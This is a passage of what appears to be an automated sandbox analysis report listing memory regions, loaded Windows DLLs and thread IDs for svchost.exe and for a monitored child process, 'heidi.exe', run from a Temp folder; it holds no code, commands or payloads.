entry_point = 0xff2a0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 667 start_va = 0x7fef81d0000 end_va = 0x7fef82a7fff entry_point = 0x7fef81d0000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 668 start_va = 0x7fef8310000 end_va = 0x7fef831bfff entry_point = 0x7fef8310000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 669 start_va = 0x7fef8470000 end_va = 0x7fef8477fff entry_point = 0x7fef8470000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 670 start_va = 0x7fef8670000 end_va = 0x7fef86e3fff entry_point = 0x7fef8670000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 671 start_va = 0x7fef8e90000 end_va = 0x7fef8e9ffff entry_point = 0x7fef8e90000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 672 start_va = 0x7fef8ea0000 end_va = 0x7fef8eb1fff entry_point = 0x7fef8ea0000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 673 start_va = 0x7fef9990000 end_va = 0x7fef9a0bfff entry_point = 0x7fef9990000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 674 start_va = 0x7fef9d10000 end_va = 0x7fef9d28fff entry_point = 0x7fef9d10000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 675 start_va = 0x7fef9d60000 end_va = 0x7fef9dc3fff entry_point = 0x7fef9d60000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 676 start_va = 0x7fef9dd0000 end_va = 0x7fef9e40fff entry_point = 0x7fef9dd0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 677 start_va = 0x7fefa4d0000 end_va = 0x7fefa4e7fff entry_point = 0x7fefa4d0000 region_type = mapped_file name = "vmictimeprovider.dll" filename = "\\Windows\\System32\\vmictimeprovider.dll" (normalized: "c:\\windows\\system32\\vmictimeprovider.dll") Region: id = 678 start_va = 0x7fefa540000 end_va = 0x7fefa59ffff entry_point = 0x7fefa540000 region_type = mapped_file name = "w32time.dll" filename = "\\Windows\\System32\\w32time.dll" (normalized: "c:\\windows\\system32\\w32time.dll") Region: id = 679 start_va = 0x7fefb0b0000 end_va = 0x7fefb0c7fff entry_point = 0x7fefb0b0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 680 start_va = 0x7fefb150000 end_va = 0x7fefb160fff entry_point = 0x7fefb150000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 681 start_va = 0x7fefb180000 end_va = 0x7fefb1d2fff entry_point = 0x7fefb180000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 682 start_va = 0x7fefb350000 end_va = 0x7fefb359fff entry_point = 0x7fefb350000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 683 start_va = 0x7fefb3b0000 end_va = 0x7fefb3bafff entry_point = 0x7fefb3b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 684 start_va = 0x7fefb3c0000 end_va = 0x7fefb3e6fff entry_point = 0x7fefb3c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 685 start_va = 0x7fefb3f0000 end_va = 0x7fefb456fff entry_point = 0x7fefb3f0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 686 start_va = 0x7fefb480000 end_va = 0x7fefb48bfff entry_point = 0x7fefb480000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 687 start_va = 0x7fefb6a0000 end_va = 0x7fefb6b4fff entry_point = 0x7fefb6a0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 688 start_va = 0x7fefbc00000 end_va = 0x7fefbc0afff entry_point = 0x7fefbc00000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 689 start_va = 0x7fefbc10000 end_va = 0x7fefbc28fff entry_point = 0x7fefbc10000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 690 start_va = 0x7fefbc30000 end_va = 0x7fefbc44fff entry_point = 0x7fefbc30000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 691 start_va = 0x7fefbdf0000 end_va = 0x7fefbe07fff entry_point = 0x7fefbdf0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 692 start_va = 0x7fefca90000 end_va = 0x7fefca9bfff entry_point = 0x7fefca90000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 693 start_va = 0x7fefcb60000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb60000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 694 start_va = 0x7fefcc60000 end_va = 0x7fefcc7afff entry_point = 0x7fefcc60000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 695 start_va = 0x7fefcc80000 end_va = 0x7fefcc9dfff entry_point = 0x7fefcc80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 696 start_va = 0x7fefcd90000 end_va = 0x7fefcd99fff entry_point = 0x7fefcd90000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 697 start_va = 0x7fefcec0000 end_va = 0x7fefcf06fff entry_point = 0x7fefcec0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 698 start_va = 0x7fefcfb0000 end_va = 0x7fefcfdffff entry_point = 0x7fefcfb0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 699 start_va = 0x7fefcfe0000 end_va = 0x7fefd03afff entry_point = 0x7fefcfe0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 700 start_va = 0x7fefd150000 end_va = 0x7fefd156fff entry_point = 0x7fefd150000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 701 start_va = 0x7fefd160000 end_va = 0x7fefd1b4fff entry_point = 0x7fefd160000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 702 start_va = 0x7fefd1c0000 end_va = 0x7fefd1d6fff entry_point = 0x7fefd1c0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 703 start_va = 0x7fefd490000 end_va = 0x7fefd4a3fff entry_point = 0x7fefd490000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 704 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff entry_point = 0x7fefd5e0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 705 start_va = 0x7fefd790000 end_va = 0x7fefd7b4fff entry_point = 0x7fefd790000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 706 start_va = 0x7fefd7c0000 end_va = 0x7fefd850fff entry_point = 0x7fefd7c0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 707 start_va = 0x7fefd8a0000 end_va = 0x7fefd8aefff entry_point = 0x7fefd8a0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 708 start_va = 0x7fefd8b0000 end_va = 0x7fefd8c3fff entry_point = 0x7fefd8b0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 709 start_va = 0x7fefd8d0000 end_va = 0x7fefd8defff entry_point = 0x7fefd8d0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 710 start_va = 0x7fefdc30000 end_va = 0x7fefdc9afff entry_point = 0x7fefdc30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 711 start_va = 0x7fefdca0000 end_va = 0x7fefdd3efff entry_point = 0x7fefdca0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 712 start_va = 0x7fefddc0000 end_va = 0x7fefde9afff entry_point = 0x7fefddc0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 713 start_va = 0x7fefdf40000 end_va = 0x7fefdfb0fff entry_point = 0x7fefdf40000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 714 start_va = 0x7fefe1a0000 end_va = 0x7fefe1a7fff entry_point = 0x7fefe1a0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 715 start_va = 0x7fefe1b0000 end_va = 0x7fefe286fff entry_point = 0x7fefe1b0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 716 start_va = 0x7fefe290000 end_va = 0x7fefe2dcfff entry_point = 0x7fefe290000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 717 start_va = 0x7fefe2e0000 end_va = 0x7fefe2fefff entry_point = 0x7fefe2e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 718 start_va = 0x7fefe300000 end_va = 0x7fefe502fff entry_point = 0x7fefe300000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 719 start_va = 0x7fefe570000 end_va = 0x7fefe5d6fff entry_point = 0x7fefe570000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 720 start_va = 0x7feff370000 end_va = 0x7feff478fff entry_point = 0x7feff370000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 721 start_va = 0x7feff6e0000 end_va = 0x7feff80cfff entry_point = 0x7feff6e0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 722 start_va = 0x7feff810000 end_va = 0x7feff81dfff entry_point = 0x7feff810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 723 start_va = 0x7feff950000 end_va = 0x7feffa18fff entry_point = 0x7feff950000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 724 start_va = 0x7feffa20000 end_va = 0x7feffab8fff entry_point = 0x7feffa20000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 725 start_va = 0x7feffc60000 end_va = 0x7feffc8dfff entry_point = 0x7feffc60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 726 start_va = 0x7feffca0000 end_va = 0x7feffca0fff entry_point = 0x7feffca0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 727 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 728 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 729 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 730 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 731 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 732 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 733 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 734 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 735 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 736 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 737 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 738 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 739 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 740 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 741 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 32 os_tid = 0x940 Thread: id = 33 os_tid = 0x778 Thread: id = 34 os_tid = 0x470 Thread: id = 35 os_tid = 0x53c Thread: id = 36 os_tid = 0x75c Thread: id = 37 os_tid = 0x748 Thread: id = 38 os_tid = 0x744 Thread: id = 39 os_tid = 0x70c Thread: id = 40 os_tid = 0x6fc Thread: id = 41 os_tid = 0x6f8 Thread: id = 42 os_tid = 0x148 Thread: id = 43 os_tid = 0x3e8 Thread: id = 44 os_tid = 0x3dc Process: id = "3" image_name = "heidi.exe" filename = "c:\\users\\kft6utqw\\appdata\\local\\temp\\heidi.exe" page_root = "0x46ffe000" os_pid = "0xa3c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x930" cmd_line = "\"C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe\" " cur_dir = "C:\\Users\\kFT6uTQW\\Desktop\\" os_username = "XABNCPUWKW\\kFT6uTQW" os_groups = "XABNCPUWKW\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000de82" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 750 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 751 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 752 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 753 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 754 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 755 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 756 start_va = 0x400000 end_va = 0x4b8fff entry_point = 0x400000 region_type = mapped_file name = "heidi.exe" filename = "\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe" (normalized: "c:\\users\\kft6utqw\\appdata\\local\\temp\\heidi.exe") Region: id = 757 start_va = 0x77980000 end_va = 0x77b28fff entry_point = 0x77980000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 758 start_va = 0x77b60000 end_va = 0x77cdffff entry_point = 0x77b60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 759 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 760 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 761 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 762 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 763 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 764 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 765 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 766 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 767 start_va = 0x74ef0000 end_va = 0x74ef7fff entry_point = 0x74ef0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 768 start_va = 0x74f00000 end_va = 0x74f5bfff entry_point = 0x74f00000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 769 start_va = 0x74f60000 end_va = 0x74f9efff entry_point = 0x74f60000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 770 start_va = 0x77760000 end_va = 0x77859fff entry_point = 0x0 region_type = private name = "private_0x0000000077760000" filename = "" Region: id = 771 start_va = 0x77860000 end_va = 0x7797efff entry_point = 0x0 region_type = private name = "private_0x0000000077860000" filename = "" Region: id = 772 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 773 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 774 start_va = 0x380000 end_va = 0x3e6fff entry_point = 0x380000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 775 start_va = 0x76df0000 end_va = 0x76efffff entry_point = 0x76df0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 776 start_va = 0x773d0000 end_va = 0x77415fff entry_point = 0x773d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 777 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 778 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 779 start_va = 0x73af0000 end_va = 0x73b73fff entry_point = 0x73af0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 780 start_va = 0x74ae0000 end_va = 0x74ae8fff entry_point = 0x74ae0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 781 start_va = 0x756b0000 end_va = 0x756bbfff entry_point = 0x756b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 782 start_va = 0x756c0000 end_va = 0x7571ffff entry_point = 0x756c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 783 start_va = 0x757f0000 end_va = 0x7587efff entry_point = 0x757f0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 784 start_va = 0x75930000 end_va = 0x75a2ffff entry_point = 0x75930000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 785 start_va = 0x75e10000 end_va = 0x75f6bfff entry_point = 0x75e10000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 786 start_va = 0x76010000 end_va = 0x760fffff entry_point = 0x76010000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 787 start_va = 0x76d50000 end_va = 0x76decfff entry_point = 0x76d50000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 788 start_va = 0x76f00000 end_va = 0x76f09fff entry_point = 0x76f00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 789 start_va = 0x77330000 end_va = 0x773cffff entry_point = 0x77330000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 790 start_va = 0x77420000 end_va = 0x774affff entry_point = 0x77420000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 791 start_va = 0x774b0000 end_va = 0x7755bfff entry_point = 0x774b0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 792 start_va = 0x77700000 end_va = 0x77718fff entry_point = 0x77700000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 793 start_va = 0x4c0000 end_va = 0x647fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 794 start_va = 0x6b0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 795 start_va = 0x75720000 end_va = 0x757ebfff entry_point = 0x75720000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 796 start_va = 0x75a60000 end_va = 0x75abffff entry_point = 0x75a60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 797 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 798 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 799 start_va = 0x6c0000 end_va = 0x840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 800 start_va = 0x850000 end_va = 0x1c4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 801 start_va = 0x1ce0000 end_va = 0x1ceffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 802 start_va = 0x1cf0000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 803 start_va = 0x74e60000 end_va = 0x74edffff entry_point = 0x74e60000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 804 start_va = 0x1df0000 end_va = 0x1feffff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 805 start_va = 0x1df0000 end_va = 0x1ecefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001df0000" filename = "" Region: id = 806 start_va = 0x1fb0000 end_va = 0x1feffff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 807 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 808 start_va = 0x74e40000 end_va = 0x74e52fff entry_point = 0x74e40000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 809 start_va = 0x1ff0000 end_va = 0x215ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 810 start_va = 0x2160000 end_va = 0x2a8ffff entry_point = 